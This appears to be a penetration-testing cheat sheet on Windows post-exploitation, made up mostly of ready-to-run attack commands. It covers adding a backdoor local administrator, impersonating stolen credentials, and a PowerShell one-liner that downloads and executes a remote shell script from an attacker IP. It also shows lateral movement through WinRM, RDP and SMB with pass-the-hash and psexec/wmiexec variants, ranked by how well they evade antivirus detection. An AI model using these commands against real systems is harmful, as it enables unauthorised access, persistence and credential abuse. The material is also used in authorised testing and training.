Windows
In this section, you will find several useful commands for the Post-Exploitation phase in Windows systems.
net user <USERNAME> <PASSWORD> /add
net localgroup Administrators <USERNAME> /add
By default, you cannot log in as a user through RDP unless it is a member of the "Remote Management Users" group.
net localgroup "Remote Management Users" <USERNAME> /add
If you have obtained some credentials and want to perform an action impersonating the actual account, you can use PowerShell.
# Storing the credentials as variables
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
There is not a grep command on the Windows system, but thanks to PowerShell we can achieve something similar.
Get-ChildItem -Recurse | Select-String "<STRING>" -List | Select Path
# Shorter version
dir -recurse *.* | sls -pattern "foobar" | select -unique path
During a pentest, it is quite common to obtain credentials that can be used for getting access to other machines. However, most Windows machines will lack of CLI services like SSH to execute commands remotely. Nonetheless, there are other Windows services that can be used to perform the same actions.
Port: 5985
Windows Remote Management (WinRM) is a protocol that allows systems to access and exchange management information. An attacker can use this protocol to obtain RCE.
In order to check who can use the WinRM Protocol run the following command.
(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disable, you can enable with the following command
Enable-PSRemoting -Force
During the session, the commands you type are executed on the remote computer, as if you were typing directly on the remote computer, but you can have only one interactive session at a time.
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -Computername <IP> -Credential <CRENTIAL>
As an alternative, you can use tools like evil-winrm or crackmapexec to execute commands.
evil-winrm -u USERNAME {-p <PASSWORD> | -H <HASH>} -i TARGET_IP
crackmapexec winrm <IP> -d <Domain Name> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'
Port: 3389
If the user is a member of the "Remote Management Users" group and port 3389 is available, an attacker with the users' credentials could connect to the victim's computer.
rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +clipboard /dynamic-resolution /u:<USERNAME> /p:'<PASSWORD>' /v:IP
/dynamic-resolution: This allows us to change the size of the window, adjusting the resolution of the lens in the process./size: WIDTHxHEIGHT: Set a specific size for machines that do not automatically resize with/dynamic-resolution.+clipboard: Enables the use of clipboards./drive:<LOCAL_DIRECTORY>,<SHARE_NAME>: Creates a shared drive between the attacking machine and the target.
Note: A useful directory to share is the
/usr/share/windows-resources directory in Kali, because it contains several Windows tools like Mimikatz.Port: 445
The SMB service can always allow an attacker to execute remote code against a windows system, as long as you have a valid account on that machine with sufficient permissions to create and run a service.
There are different tools that can achieve this goal, each one in its own way.
Uploads to
ADMIN$ a service binary with an arbitrary name. The obtained reverse shell is not interactive thus programs like PowerShell, vssadmin and plink will cause the service to fail.Furthermore, there is a high probability of being detected by AVs or EDRs.
psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
Creates a service in the same way as psexec but it does not drop any binary on the host so it is stealthier than psexec. However, it is still a non-interactive shell.
smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
# Execute Powershell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable'
# Excute command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami
It creates a semi-interactive shell without installing any service or agent, being the stealthiest of the before mentioned.
wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
Last modified 11mo ago